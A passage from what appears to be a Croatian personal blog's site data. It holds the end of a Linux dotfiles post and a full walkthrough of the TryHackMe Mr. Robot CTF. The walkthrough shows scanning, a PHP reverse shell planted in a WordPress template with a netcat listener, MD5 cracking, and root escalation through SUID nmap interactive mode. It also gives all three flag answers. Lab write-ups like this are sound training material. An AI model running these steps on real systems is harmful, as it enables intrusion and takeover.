slučaj u Windows ili GNOME sučeljima. Teoretski, učinkovito koristi prostor na zaslonu tako da je cijeli zaslon ispunjen. Ako nam ponestane prostora na prvoj radnoj površini, možemo se prečicom na tipkovnici ili mišem prebaciti na drugu radnu površinu i nastaviti koristiti ovaj operativni sustav.\n⌨️ [SXHKD]\nSXHKD je demon tipkovnice. Radi za nas kao pozadinski proces i govori BSPWM-u koju aplikaciju otvoriti ako korisnik pritisne određeni prečac na tipkovnici.\n🍫 [Polybar]\nPolybar je naša statusna traka na vrhu radne površine.\nSluži nam za prikaz obavijesti, datuma i vremena, interneta, baterije, gašenja i ponovnog pokretanja izbornika operativnog sustava te najvažnijih radnih prostora iz BSPWM-a.\n📚 [Picom]\nPicom je skladatelj; služi nam kao proces koji postavlja zaobljene rubove na svakoj aplikaciji koju otvorimo.\n🤓 [Rofi]\nRofi je proces koji otvara druge aplikacije, od najveće pomoći u pokretanju GTK aplikacija (aplikacija korisničkog sučelja).\n💻 [Alacritty] terminal.\nAlacritty služi kao emulator terminala, odnosno zamjena za standardni GNOME terminal.\nKoristimo ga uglavnom jer nam daje mogućnost postizanja boljeg izgleda uređivanjem njegovih konfiguracijskih datoteka.\n🐚 [Oh-My-ZSH] shell.\nOh-My-ZSH je okvir koji nam olakšava upravljanje ZSH konfiguracijama.\nU ovom slučaju, uglavnom se koristi za dodavanje tema na terminal koji ima ZSH shell.\nZSH (Zshell) je odabran jer je noviji, a većina ažuriranja iz drugih distribucija Linuxa već prelazi na njega u usporedbi s Bash shellom.\nKoristili smo konfiguraciju Powerlevel10k za postavljanje tema. 📋 [Vim] uređivač teksta\nKako mnogi ljudi koriste notepad na Windows operativnim sustavima, mi koristimo nano i Vim.\nNano uređivač teksta puno je lakši za korištenje, dok je Vim više namijenjen programerima zbog svojih prečaca.\nVim Airline je tema koja nam daje drugačiji izgled od običnog Vima. 📺 [Slim] zaslon za zaključavanje\nSlim je naš zaslon za zaključavanje.\nSlimlock je tema koju smo koristili za zaključani zaslon.\n💬 [Dunst] notifikacije\nDunst je proces koji radi u pozadini, a primarna mu je namjena prikazivanje obavijesti na statusnoj traci (Polybar).\nPrednost dunsta je u tome što pruža mogućnost kodiranja tema za izgled i mnoge druge funkcije kao što su. Koje obavijesti prikazati itd.\n🕶️ [Nordic Dark] GTK tema\nNordic Dark je GTK tema (tema za aplikacije korisničkog sučelja) koja nam daje mračni pogled na aplikacije s korisničkim sučeljem.\n🔷 [Flattery Dark] tema ikona\nSam naziv govori da aplikacije s korisničkim sučeljem uglavnom imaju ikone na koje možemo kliknuti mišem; ova tema nam daje drugačiji pogled na ikone.\n🔵 [Oreo Blue] tema kursora\nOva tema nam daje izgled plavog pokazivača, umetnuta je samo radi izgleda i jer odgovara svim drugim bojama ovog operativnog sustava.\n🔤 [Source Code Pro] font\nFont ovog operativnog sustava.\n🔥🦊 [Firefox] web preglednik\nKoristim Firefox jer je to jedan od najboljih web preglednika orijentiranih na privatnost, po mom mišljenju.\n🦊 [Minimal Functional Fox] firefox tema.\nOva tema je ovdje uglavnom zbog izgleda, ali i zato što je minimalna.\n⏰ tty-clock\nTty-clock je aplikacija koja ima svrhu prikazivanja vremena i datuma na terminalu.\n🎚️ CAVA audio vizualizator.\nCava je aplikacija koja služi kao audio vizualizator.\n📈 HTop\nAplikacija HTop pokazuje koji procesori trenutno rade i koliko RAM-a zauzimaju te mnoge druge stvari. Zamislite HTop kao upravitelj zadataka u operativnom sustavu Windows.\n😎 CMatrix\nCMatrix je aplikacija koja je ovdje samo radi izgleda, a svrha joj je ispisati neki tekst u otvorenom terminalu koji ima za cilj dati prikaz hakiranja iz filma Matrix.\n🖼️ SXIV\nSXIV je aplikacija za pregled slika koja nam otvara slike.\n🤠 Ranger\nRanger je aplikacija koja nam omogućuje pregled i pristup svim datotekama na računalu u terminalu.\n🗄️ Pfetch\nSvrha Pfetch aplikacije je pokazati koji operativni sustav koristimo, koji laptop/računalo imamo, koja je trenutna verzija kernela, koliko trenutno imamo uptime, koliko paketa imamo i koliko RAM-a imamo.\n⚙️ Chafa\nChafa je aplikacija koja ispisuje sliku za korištenje u terminalu, čime se postiže retro/ASCII izgled slike.\n🐍 Snake\nU ovom slučaju, Snake app je stara igrica zmija s telefona Nokia 3310 koja je malo modificirana po pitanju boja i prilagođena za igranje na terminalu.\n🍭 Lollypop\nLollypop je glazbena aplikacija, kroz nju puštamo pjesme.\nPrečaci # Kao super koristimo tipku Windows na tipkovnici. Super je najvažnija tipka na našoj tipkovnici jer je koristimo za davanje uputa demonu tipkovnice SXHKD.\nTipkovnica # Tipke Svrha super + enter Otvara terminal super + space Otvara Rofi preko kojeg otvaramo GTK aplikacije super + escape Ponovno učitava SXHKD i njegove konfiguracijske datoteke super + alt + r Ponovno pokreće BSPWM Tiling Window Manager super + w Isključuje trenutnu aplikaciju super + [1-0] Mijenja trenutni radni prostor super + g Mijenja trenutačni prozor koji je manji u područje većeg prozora, dok veći prozor stavlja na mjesto manjeg super + m Otvara aplikaciju preko cijele radne površine super + [h,j,k,l] Premješta fokus na drugi prozor super + alt + [h,j,k,l] Pomiče prozore prema van super + alt + shift + [h,j,k,l] Pomiče prozore prema unutra super + s Stavlja prozore u tzv. float mod, opciju gdje možemo staviti prozor na prozor kao u Windows operativnim sustavima super + ctrl + [strelice] Pomiče plutajuće prozore Hvala vam na vašem vremenu 💙 # ","date":"19 srpnja 2021","permalink":"/hr/blog/pop-os-nordic/","section":"Blogs","summary":"🖥️ Pop! Linux konfiguracijske datoteke 🖥️ Ovo su moje trenutne dot datoteke Pop! Linux distribuciju.\nInstalacija će vam pomoći da stvorite isti izgled kao na slikama; ovdje su upute korak po korak.","title":"[BSPWM] Pop OS Nordic"},{"content":" 🤖 TryHackMe Mr. Robot CTF 🤖 Možemo li hakirati Mr. Robot CTF? Ova virtualna mašina ima ocjenu srednje težine i naučit će nas mnogim korisnim stvarima.\nUpute će pomoći u postizanju istih odgovora.\nKorišteni programi:\nOpenVPN NMAP GoBuster Netcat Upute # Da bismo počeli hakirati ovu virtualnu mašinu, prvo se moramo spojiti na TryHackMe OpenVPN i pokrenuti stroj u Zadatku 2.\nPretpostavljam da je vaša lokalna virtualna mašina s Kali Linux operativnim sustavom.\nUspostavljanje veze putem OpenVPN-a # Prvo moramo preuzeti OpenVPN datoteku s TryHackMe-a koju su vam dali. Zatim uključite terminal u direktoriju gdje ste preuzeli OpenVPN datoteku. Veza se ostvaruje pomoću:\nsudo openvpn *IME_VAŠE_DATOTEKE*.ovpn Skeniranje mreže # Prvo moramo pogledati koji su portovi otvoreni. Što više znamo o sustavu, to bolje. U ovom slučaju koristimo Nmap za skeniranje mreže.\nNmap skeniranje # kali@kali:~/Desktop$ nmap *IP_ADRESA* -A Rezultat Nmap skeniranja # kali@kali:-/Desktop$ nmap 10.10.51.194 -A Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 18:35 CEST Nmap scan report for 10.10.38.44 Host is up (0.095s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.90 seconds Kao što vidimo, imamo otvoren port 80 koji nam govori da je ovo web stranica na HTTP protokolu.\nInstalacija seclists-a # sudo apt install seclists Nakon ove naredbe seclists će biti instaliran u direktorij /usr/share/seclists/.\nSkeniranje web poslužitelja i njegovih direktorija # kali@kali:~/Desktop$ gobuster dir -u http://10.10.51.194/ -w /usr/share/seclists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.51.194/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/23 18:27:45 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 213] /.htaccess (Status: 403) [Size: 218] /.htpasswd (Status: 403) [Size: 218] /0 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/0/] /Image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/Image/] /admin (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/admin/] /atom (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/atom/] /audio (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/audio/] /blog (Status: 301) [Size: 233] [--\u0026gt; http://10.10.51.194/blog/] /css (Status: 301) [Size: 232] [--\u0026gt; http://10.10.51.194/css/] /dashboard (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-admin/] /favicon.ico (Status: 200) [Size: 0] /feed (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /images (Status: 301) [Size: 235] [--\u0026gt; http://10.10.51.194/images/] /image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/image/] /index.php (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /index.html (Status: 200) [Size: 1188] /js (Status: 301) [Size: 231] [--\u0026gt; http://10.10.51.194/js/] /intro (Status: 200) [Size: 516314] /license (Status: 200) [Size: 309] /login (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php] /page1 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /phpmyadmin (Status: 403) [Size: 94] /readme (Status: 200) [Size: 64] /rdf (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/rdf/] /robots (Status: 200) [Size: 41] /robots.txt (Status: 200) [Size: 41] /rss (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /rss2 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /sitemap (Status: 200) [Size: 0] /sitemap.xml (Status: 200) [Size: 0] /video (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/video/] /wp-admin (Status: 301) [Size: 237] [--\u0026gt; http://10.10.51.194/wp-admin/] /wp-content (Status: 301) [Size: 239] [--\u0026gt; http://10.10.51.194/wp-content/] /wp-config (Status: 200) [Size: 0] /wp-includes (Status: 301) [Size: 240] [--\u0026gt; http://10.10.51.194/wp-includes/] /wp-cron (Status: 200) [Size: 0] /wp-links-opml (Status: 200) [Size: 227] /wp-load (Status: 200) [Size: 0] /wp-login (Status: 200) [Size: 2606] /wp-mail (Status: 500) [Size: 3064] /wp-settings (Status: 500) [Size: 0] /wp-signup (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php?action=register] /xmlrpc (Status: 405) [Size:42] =============================================================== 2021/05/23 18:40:33 Finished =============================================================== Pronalaženje prvog ključa # Nakon skeniranja, možemo vidjeti više direktorija koje se nalaze na ovom web poslužitelju. Ako pogledamo TryHackMe savjet za prvi ključ, možemo vidjeti da je naš savjet robots.txt. Pretpostavljam da je ovaj savjet i /robots direktorij povezan. Pored njih me zanima /wp-login; Pretpostavljam da je to WordPress.\nUlaskom na stranicu Unesite dobivenu IP adresu u svoj web preglednik:\nAli ako upišemo našu vezu /robots.txt (IP_ADRESA/robots.txt), možemo vidjeti da izbacuje prvi ključ, koji je u .txt formatu.\nPronašli smo dvije datoteke, jednu fsociety.dic i key-1-of-3.txt. Prva datoteka izgleda kao datoteka rječnika.\nPreuzimanje prvog ključa # Prvi ključ možemo vidjeti ulaskom na stranicu (http://IP_ADRESA/key-1-of-3.txt), ali ga možemo i preuzeti pomoću naredbe curl.\ncurl -s http://IP_ADDRESS/key-1-of-3.txt Rezultat # kali@kali:~/Desktop$ curl -s http://10.10.51.194/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9 Prvi ključ: 073403c8a58a1f80d943455fb30724b9\nPronalaženje drugog ključa # SAVJET: Bijeli tekst.\nAko se vratimo na gobuster možemo vidjeti da smo imali WordPress direktorij. Konkretno me zanima:\n/login (Status: 302) /wp-content (Status: 301) /admin (Status: 301) /wp-login (Status: 200) /license (Status: 200) /wp-includes (Status: 301) Kao što vidimo, direktorij /license ima status 200. Status 200 nam govori da je stranica aktivna. Curl je naš najbolji prijatelj u ovom slučaju.\nCurl komanda # curl -s http://IP_ADDRESS/license | tr -d \u0026#34;\\n\u0026#34; Rezultat # kali@kali:~/Desktop$ curl -s http://10.10.51.194/license | tr -d \u0026#34;\\n\u0026#34; what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo= Određeni tekst je ZWxsaW90OkVSMjgtMDY1Mgo= izgleda kao base64.\nDešifriranje Base64 # Naredba koju ćemo koristiti je:\necho \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d Rezultat dešifriranja Base64 # kali@kali:~/Desktop$ echo \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d elliot:ER28-0652 Korisničko ime i lozinku dobili smo, pretpostavljam, od WordPressa.\nZanimljivost: Kod je referenca na Elliotov broj s osobne iskaznice na poslu i pojavljuje se u seriji. WordPress enumeracija # Vrijeme je da se pokušamo prijaviti na WordPress:\nPrvi korak je otići na:\nhttp://IP_ADRESA/wp-login Nakon prijave na stranicu odmah u donjem lijevom kutu vidimo da je verzija WordPressa 4.3.1. Ovo je stara verzija WordPressa.\nNalazimo dva korisnika, od kojih smo Elliot (mi) administrator.\nVidimo da je ova stara verzija WordPressa ranjiva na PHP Reverse Shell. [POVEZNICA SKRIPTE]( https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master /php-reverse-shell.php)\nBudući da smo administratori, moramo ići na Izgled.\nMoramo zamijeniti kod sa skriptom na 404 PHP predlošku.\nNapomena: Obratite pozornost na IP adresu u kodu; ovdje imamo lokalnu IP adresu, tj. IP adresa našeg računala. Možemo provjeriti lokalnu IP adresu s ifconfig. PHP reverse shell preko netcat-a # Nakon što smo zamijenili i promijenili IP adresu u skripti, pokrenut ćemo Netcat na portu koji s nama uspostavlja vezu preko skripte. To radimo sljedećom naredbom:\nnc -nlvp 1234 Nakon toga, moramo otići na http://IP_ADRESA/404.php ovaj link u web pregledniku.\nKao što vidimo, otvorili smo školjku u terminalu. Netcat je uspostavio vezu.\nSada ćemo provjeriti koje se datoteke nalaze u direktoriju /home/robot. To radimo naredbom:\nls -l /home/robot Sada znamo lokaciju drugog ključa:\n$ ls -l /home/robot total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 Problem je u tome što mi uopće nismo robot korisnik na ovom sistemu. To provjeravamo naredbom whoami.\n$ whoami daemon Jedina datoteka koju možemo vidjeti je password.raw-md5. Pogledajmo što je u ovoj datoteci.\n$ cat /home/robot/password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b Dešifriranje MD5 hash-a # To je MD5 Hash. Hash je matematička funkcija koja se ne može vratiti nakon što obavi svoj posao. Ovo je dobro za pohranjivanje lozinki, ali MD5 je star algoritam i lako ga je probiti.\nPrvo ćemo pogledati može li se ovaj hash provaliti online kako bismo uštedjeli vrijeme. LINK Kao što vidimo na gornjoj poveznici, može. Zaporka je abcdefghijklmnopqrstuvwxyz\nSada se moramo prijaviti kao robot korisnik. To radimo sljedećom naredbom:\nsu - robot Ali postoji problem:\n$ su - robot su: must be run from a terminal Python shell # Ovo se može popraviti pomoću Pythona. Prvo moramo provjeriti je li Python uopće instaliran.\n$ which python /usr/bin/python Napravimo shell s Pythonom. To možemo učiniti ovom naredbom:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; Kao što vidite, terminal nije pokazao nikakve pogreške, što znači da smo uspješno kreirali shell u Pythonu.\nPrijavimo se kao korisnik robot.\n$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami whoami robot $ Kao što vidimo, prijavljeni smo kao robot korisnik.\nDrugi ključ # Da bismo vidjeli drugi ključ, moramo upotrijebiti naredbu cat:\ncat key-2-of-3.txt Rezultat:\n$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 Drugi ključ: 822c73956184f694993bede3eb39f959\nPronalaženje trećeg ključa # SAVJET: NMAP\nAko se vratimo na Nmap rezultat koji smo dobili na početku; možemo vidjeti da je SSH port zatvoren. Konačni ključ uglavnom se nalazi u direktoriju /root. Da bismo dobili root, moramo izvršiti eskalaciju privilegija. Prvo što me zanima je da li je korisnik robot u takozvanoj sudo grupi.\nEskalacija privilegija # Je li korisnik robot u sudo grupi?\n$ sudo -l sudo -l [sudo] password for robot: abcdefghijklmnopqrstuvwxyz Sorry, user robot may not run sudo on linux. Korisnik robot nije na popisu sa sudo privilegijama. Sada možemo vidjeti koji su programi pod root korisnikom.\nProvjera SETUID-a koji su pod root kontrolom: # Naredba:\nfind / -user root -perm -4000 -print 2\u0026gt;/dev/null Rezultat:\n$ find / -user root -perm -4000 -print 2\u0026gt;/dev/null / -user root -perm -4000 -print 2\u0026gt;/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown Odmah sam primijetio /usr/local/bin/nmap. Da vidimo koja je to verzija Nmapa.\nProvjera verzije Nmapa: # Naredba:\nnmap --version Rezultat:\n$ nmap --version nmap --version nmap version 3.81 ( http://www.insecure.org/nmap/ ) Kao što vidimo, Nmap verzija je 3.81.\nEnumeracija: # Nakon malo istraživanja, saznao sam:\nLINK kao što možemo pročitati na gornjoj poveznici, ovo je starija verzija Nmapa. Verzije od 2.02 do 5.21 imale su tzv. Interaktivni način nam je omogućio izvršavanje naredbi. Osim toga, provjera SETUID omogućit će nam pokretanje naredbi kao root.\n$ ls -l /usr/local/bin/nmap ls -l /usr/local/bin/nmap -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap Pokretanje Nmapa u interaktivnom modu: # Naredba:\nnmap --interactive Rezultat:\n$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help nmap\u0026gt; !whoami !whoami root waiting to reap child : No child processes Vidimo da je Nmap u interaktivnom root modu.\nPronalaženje konačnog ključa: # Prvo ćemo provjeriti je li treća zastavica u korijenu.\nNaredba:\n!ls /root Rezultat:\nnmap\u0026gt; !ls /root !ls /root firstboot_done key-3-of-3.txt waiting to reap child : No child processes Pronašli smo treći ključ koji se nalazi u tekstualnoj datoteci. Sadržaj možemo pročitati sljedećom naredbom:\n!cat /root/key-3-of-3.txt nmap\u0026gt; !cat /root/key-3-of-3.txt !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 waiting to reap child : No child processes Treći ključ: 04787ddef27c3dee1ee161b21670b4e4\nZaključak # Zanimljiv CTF s puno referenci na seriju. Puno sam naučio, a najvažnije je redovito ažuriranje operativnih sustava i aplikacija, kao što vidimo u primjeru sa starijom verzijom Nmapa i WordPressa. Također, ne dopustite nikome da hakira vaše račune, redovito mijenjajte kodove i koristite nasumične kodove s minimalnom duljinom od 32 znamenke za svaki račun. Svatko bi trebao slijediti jednu lozinku, jedan račun i jednu adresu e-pošte.\nKljučevi # Popis pitanja i odgovora:\nPitanja Odgovori Što je ključ 1 ? 073403c8a58a1f80d943455fb30724b9 Što je ključ 2 ? 822c73956184f694993bede3eb39f959 Što je ključ 3 ? 04787ddef27c3dee1ee161b21670b4e4 Hvala na vašem vremenu 💙 # ","date":"23 svibnja 2021","permalink":"/hr/blog/mr-robot-ctf/","section":"Blogs","summary":"🤖 TryHackMe Mr. Robot CTF 🤖 Možemo li hakirati Mr. Robot CTF? Ova virtualna mašina ima ocjenu srednje težine i naučit će nas mnogim korisnim stvarima.\nUpute će pomoći u postizanju istih odgovora.","title":"Mr. Robot CTF"},{"content":"","date":"1 siječnja 0001","permalink":"/hr/tags/","section":"Tags","summary":"","title":"Tags"}]